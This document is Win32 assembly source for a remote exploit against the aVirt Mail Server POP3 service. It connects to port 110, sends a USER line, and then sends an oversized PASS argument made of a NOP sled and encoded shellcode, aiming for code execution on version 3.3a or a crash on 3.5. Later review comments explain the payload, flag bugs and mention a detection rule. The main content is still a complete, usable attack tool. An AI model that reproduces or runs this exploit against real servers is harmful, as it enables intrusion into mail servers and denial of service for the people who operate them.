
  1. ;========================================================================
  2. ; This is the source code of Avirt 3.3a Buffer oVerflow                 =
  3. ; or Avirt 3.5 D.O.S                                                    =
  4. ; Source by: Luck Martins , USSR                                        =
  5. ; www.ussrback.com                                                      =
  6. ;                                                                       =
  7. ;Recomendation: dont read this Source :), or you can get Crazzzy!!!     =
  8. ;========================================================================
  9.  
  10. .386p
  11. locals
  12. jumps
  13. .model flat, stdcall
  14.  
  15. extrn   GetCommandLineA:PROC
  16. extrn   GetStdHandle:PROC
  17. extrn   WriteConsoleA:PROC
  18. extrn   ExitProcess:PROC
  19. extrn   WSAStartup:PROC
  20. extrn   connect:PROC
  21. extrn   send:PROC
  22. extrn   recv:PROC
  23. extrn   WSACleanup:PROC
  24. extrn   htons:PROC
  25. extrn   socket:PROC
  26. extrn   inet_addr:PROC
  27. extrn   closesocket:PROC
  28. Extrn    GetModuleHandleA          : PROC
  29. Extrn    GetProcAddress              : PROC
  30. Extrn    lstrlenA              : PROC
  31.  
  32. .data
  33.  
  34.  
  35. sploit_code label byte          ; payload blob, sent verbatim by the second send() in start
      ; Opaque bytes; the file header calls this the Avirt 3.3a overflow / 3.5 DoS
      ; payload. Its contents are not decoded in this listing. The first five
      ; bytes are ASCII "PASS " (80,65,83,83,32), so on the wire the blob arrives
      ; as an oversized POP3 PASS argument immediately after the USER line in
      ; senduser -- the length anomaly on port 110 a detection rule would key on.
  36.  DB 80,65,83,83,32,139,241,102,129,238,144,2,176,48,51,201,102,185,71,2
  37.  DB 102,49,6,102,70,226,249,144,144,144,144,144,144,144,144,144,144,144,144,144
  38.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  39.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  40.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  41.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  42.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  43.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  44.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  45.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,216,48,48
  46.  DB 48,48,109,177,221,21,32,112,48,177,244,48,51,48,48,3,240,3,235,3
  47.  DB 198,3,207,3,226,3,249,188,248,152,52,69,62,187,181,166,33,112,48,187
  48.  DB 173,129,33,112,48,219,60,187,181,162,33,112,48,187,173,157,33,112,48,219
  49.  DB 60,106,106,106,106,106,106,106,106,106,106,106,106,189,189,170,33,112,48,97
  50.  DB 96,207,227,185,181,153,33,112,48,188,248,152,52,69,62,187,181,166,33,112
  51.  DB 48,187,173,129,33,112,48,219,60,187,181,162,33,112,48,187,173,157,33,112
  52.  DB 48,189,189,244,33,112,48,97,96,207,227,185,181,225,33,112,48,189,181,133
  53.  DB 33,112,48,96,207,165,225,33,112,48,185,181,240,33,112,48,189,189,229,33
  54.  DB 112,48,97,207,133,240,33,112,48,207,165,153,33,112,48,185,181,209,33,112
  55.  DB 48,188,248,152,52,69,56,187,181,166,33,112,48,219,54,187,181,162,33,112
  56.  DB 48,189,189,213,33,112,48,97,96,207,165,153,33,112,48,185,181,221,33,112
  57.  DB 48,219,48,188,248,152,52,69,56,187,181,166,33,112,48,219,54,187,181,162
  58.  DB 33,112,48,189,189,193,33,112,48,97,96,207,165,153,33,112,48,185,181,206
  59.  DB 33,112,48,189,181,50,34,112,48,96,90,48,90,48,189,181,122,33,112,48
  60.  DB 96,90,48,90,48,187,181,206,33,112,48,207,224,219,206,80,216,48,48,48
  61.  DB 48,109,177,221,96,33,112,48,88,32,48,52,48,189,173,43,34,112,48,99
  62.  DB 189,173,30,34,112,48,99,90,48,207,165,209,33,112,48,90,51,189,133,54
  63.  DB 34,112,48,102,207,165,221,33,112,48,81,242,32,48,123,117,98,126,117,124
  64.  DB 3,2,30,84,92,92,48,48,48,199,143,48,48,192,71,119,85,68,96,66
  65.  DB 95,83,113,84,84,66,85,67,67,48,48,48,48,48,152,93,199,143,32,112
  66.  DB 193,71,101,99,117,98,3,2,30,116,124,124,48,48,48,48,48,124,95,81
  67.  DB 84,124,89,82,66,81,66,73,113,48,48,48,48,48,125,85,67,67,81,87
  68.  DB 85,114,95,72,113,48,48,48,48,48,103,89,94,117,72,85,83,48,48,48
  69.  DB 48,48,115,66,85,81,68,85,100,88,66,85,81,84,48,48,48,48,48,48
  70.  DB 48,48,48,108,71,89,94,84,95,71,67,108,94,95,68,85,64,81,84,30
  71.  DB 85,72,85,48,105,95,69,16,113,66,85,16,117,72,64,92,95,89,68,85
  72.  DB 84,30,48,96,81,68,83,88,16,68,88,89,67,16,64,66,95,87,66,81
  73.  DB 93,16,64,92,85,81,67,85,30,30,30,30,30,30,30,48,48,48,48,48
  74.  DB 48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,176,222,84
  75.  DB 1,97,33,97,97,97,97,97,97,97,97,97,97,97,97,97,97,0,193,4
  76.  DB 0,0,193,4,0,0,193,4,0,190,32,32,32,32,176,48,102,185,71,2
  77.  DB 102,46,103,49,4,102,70,226,247,0,1,84,222,176
  78.  
  79. sploit_code_length   equ     $-sploit_code   ; assembler-computed byte count, passed as the send() length
  80.  
  81. senduser        db 'USER itsme',13,10      ; POP3 USER line, CRLF-terminated; first thing sent after connect
  82. senduserl       equ  $-senduser            ; byte length handed to send()
  83.  
  84. Copy            db "aVirt Mail Server 3.3a Remote Oveflow.", 13, 10   ; banner + usage text, printed only when no host argument is found
  85.                 db "or aVirt Mail Server 3.5 Denial of Service", 13, 10
  86.                 db "by: Luck Martins, Ussr",13,10
  87.                 db "for source code or binary go to: http://www.ussrback.com/avirtro",13,10,13,10
  88.                 db "Usage: AvirtExp HostIp", 13, 10
  89.                 db "Example: AvirtExp 205.488.47.6",13,10,0
                      ; NOTE(review): "488" is not a valid IPv4 octet, so the example is malformed (display text only; the
                      ; real argument goes through inet_addr in start)
  90. Copyl        equ $-Copy                    ; length includes the trailing 0 byte
  91.  
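  92. wsadescription_len equ 256             ; WSADESCRIPTION_LEN
  93. wsasys_status_len equ 128              ; WSASYS_STATUS_LEN
  94.  
      ; Winsock WSADATA as laid out on 32-bit Windows: 400 bytes, lpVendorInfo is a
      ; 4-byte pointer that sits at offset 396 behind 2 alignment bytes.
      ; The original declared lpVendorInfo as dw with no padding, making the struct
      ; 396 bytes; WSAStartup fills the full 400, so the last 4 bytes spilled into
      ; sin (declared right after wsadata). That was harmless only because
      ; sin_family and sin_port are written after WSAStartup returns.
  95. WSAdata struct
  96. wVersion dw ?                          ; version WSAStartup settled on
  97. wHighVersion dw ?                      ; highest version the DLL supports
  98. szDescription db wsadescription_len+1 dup (?)
  99. szSystemStatus db wsasys_status_len+1 dup (?)
  100. iMaxSockets dw ?
  101. iMaxUdpDg dw ?
       wPad dw ?                              ; alignment padding before the pointer
  102. lpVendorInfo dd ?                      ; char* (was dw)
  103. WSAdata ends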
  104.  
       ; Winsock sockaddr_in, 16 bytes (2+2+4+8), matching the C layout
  105. sockaddr_in struct
  106. sin_family dw ?                 ; set to 2 (AF_INET) in start
  107. sin_port dw ?                   ; network byte order, result of htons
  108. sin_addr dd ?                   ; result of inet_addr on the host argument
  109. sin_zero db 8 dup (0)           ; padding, left zero
  110. sockaddr_in ends
  111.  
  112. wsadata WSAdata                 ; filled by WSAStartup; sin follows immediately in memory
  113. sin sockaddr_in                 ; target address; fields written in start before connect
  114. sock dd ?                       ; SOCKET from socket(); never compared against INVALID_SOCKET
  115. numbase dd 10                   ; not referenced anywhere in the visible code
  116. hostParamether db 256 dup (?)   ; host argument copied here by rep movsb in start; the copy has
                                       ; no bound against 256 and appends no terminator -- inet_addr
                                       ; appears to rely on the untouched zero tail of this array
  117. buffer dd 1000 dup (0)          ; 4000 zero bytes; recv reads at most 1000, so lstrlenA always
                                       ; finds a terminator
  118. buffer2 dd 1000 dup (0)         ; second recv target (never printed, see start)
  119.  
  120. i_cant_connect    db 'fata: sorry i can',27h,'t connect to this host!',13,10   ; shown when connect returns non-zero
  121. i_cant_connectl equ $-i_cant_connect
  122.  
  123. SendingExploit    db 'ok!: Sending exploit code....',13,10
  124. SendingExploitl equ $-SendingExploit
  125.  
  126. include code.inc                ; presumably supplies the Write_Console macro used in start -- not visible here
  127.  
  128. cchWritten dd 0                 ; NOTE(review): looks like the chars-written out-param for WriteConsoleA; confirm in code.inc
  129. ConHandle dd 0                  ; STD_OUTPUT_HANDLE, stored at the top of start
  130.  
  131. .code
  ; start -- program entry (TASM, .model flat stdcall, Win32).
  ; Flow: take the host argument from GetCommandLineA, open a TCP connection to
  ; port 110, echo the server's first reply, send the USER line, then send the
  ; sploit_code blob and exit. Write_Console is a macro from code.inc (not
  ; visible here); every other call is a direct Win32/Winsock stdcall import.
  ; Registers: edi/esi/ecx drive the command-line scan and copy, eax carries
  ; return values. No stack frame. The results of WSAStartup, socket, inet_addr,
  ; send and recv are never checked.
  132. start:
  133.     xor    eax,eax                ; clear all GPRs before the first call
  134.     xor    ebx,ebx
  135.     xor    edx,edx
  136.     xor    ecx,ecx
  137.     xor    esi,esi
  138.     xor    edi,edi
  139.     xor    ebp,ebp
  140.     Push    -11                   ; STD_OUTPUT_HANDLE
  141.     Call    GetStdHandle
  142.     Mov    [ConHandle],EAX        ; console handle for Write_Console
  143.     call    GetCommandLineA
  144.     mov    edi, eax               ; edi = whole command line; the program name comes first
  145.     mov    ecx, -1
  146.     xor    al, al
  147.     push    edi
  148.     repnz    scasb                ; find the 0 terminator
  149.     not    ecx                    ; ecx = length including the terminator
  150.     pop    edi
  151.     mov    al, 20h
  152.     repnz    scasb                ; advance edi past the first space
  153.     dec    ecx                    ; ecx = bytes after that space, excluding the terminator
         ; NOTE(review): if the command line contains no space at all, this scan runs
         ; through the terminator, ecx wraps to -1 and the check below reads one byte
         ; past the string; reaching the usage text then depends on that byte being 0.
  154.     mov    esi, edi               ; esi = start of the host argument
  155.     cmp    byte ptr [esi],0
  156.     je    no_command_line         ; empty argument -> print usage
  157.     cmp    byte ptr [esi],20      ; NOTE(review): decimal 20 (14h), not 20h -- a leading
  158.     je    incrementa1             ; space is never skipped; only a DC4 byte reaches incrementa1
  159. continue:
  160.         lea     edi, hostParamether
  161.     rep    movsb                  ; copy ecx bytes; no terminator appended and no bound against
                                         ; the 256-byte array, so a longer argument runs into buffer;
                                         ; the 0 inet_addr needs comes from the zero tail of the array
  162.     push    offset wsadata
  163.     push    0101h                 ; request Winsock 1.1
  164.     call    WSAStartup            ; return value ignored
  165.     xor    eax, eax
  166.     push    eax                   ; protocol = 0
  167.     inc    eax
  168.     push    eax                   ; type = 1 (SOCK_STREAM)
  169.     inc    eax
  170.     push    eax                   ; af = 2 (AF_INET)
  171.     call    socket
  172.     mov    sock, eax              ; INVALID_SOCKET not detected
  173.     mov    sin.sin_family, 2      ; AF_INET
  174.     mov    eax,110d               ; TCP port 110 (POP3)
  175.     push    eax
  176.     call    htons
  177.  
  178.     mov    sin.sin_port, ax       ; network byte order
  179.         push    offset hostParamether
  180.     call    inet_addr             ; dotted-quad only; INADDR_NONE on a bad string is not checked
  181.  
  182.     mov    sin.sin_addr, eax
  183.     push    size sin
  184.     push    offset sin
  185.     push    sock
  186.     call    connect
  187.     or    eax, eax
  188.     jz    connectionworking       ; 0 = connected
  189.     Write_Console <offset i_cant_connect > <i_cant_connectl >
  190.     jmp    the_end
  191. incrementa1:
  192.     inc   si                      ; 16-bit increment: only the low word of esi moves, and ecx
  193.     jmp   continue                ; is not reduced, so the copy also takes the string terminator
  194. connectionworking:
  195.     xor    eax, eax
  196.     push    eax                   ; flags = 0
  197.     push    1000                  ; at most 1000 bytes into the 4000-byte buffer
  198.     push    offset buffer
  199.     push    sock
  200.     call    recv                  ; byte count / SOCKET_ERROR ignored; the reply is measured
  201.         push    offset buffer     ; with lstrlenA instead, which relies on buffer's zero fill
  202.     call    lstrlenA
  203.     Write_Console <offset buffer  > <eax >   ; echo the server banner
  204.         Write_Console <offset SendingExploit > <SendingExploitl >
  205.         xor     eax, eax
  206.     push    eax
  207.     push    senduserl
  208.     push    offset senduser
  209.     push    sock
  210.     call    send                  ; USER line
  211.         xor     eax, eax
  212.     push    eax
  213.     push    1000
  214.         push    offset buffer2
  215.     push    sock
  216.     call    recv                  ; reply to USER lands in buffer2 ...
  217.         push    offset buffer     ; NOTE(review): ... but buffer, not buffer2, is measured and
  218.     call    lstrlenA              ; printed here, so the banner is echoed twice and the USER
  219.     Write_Console <offset buffer  > <eax >   ; reply is never shown
  220.         xor     eax, eax
  221.     push    eax
  222.     push    sploit_code_length
  223.     push    offset sploit_code
  224.     push    sock
  225.     call    send                  ; payload blob; nothing is read back afterwards
  226. the_end:
  227.     push    sock
  228.     call    closesocket
  229.     call    WSACleanup
  230. final_exit:
  231.     push    0
  232.     call    ExitProcess
  233. no_command_line:
  234.     Write_Console <offset Copy > <Copyl >   ; usage text
  235.     jmp   final_exit              ; skips closesocket/WSACleanup; nothing was opened on this path
  236. end start
  237.  
  238.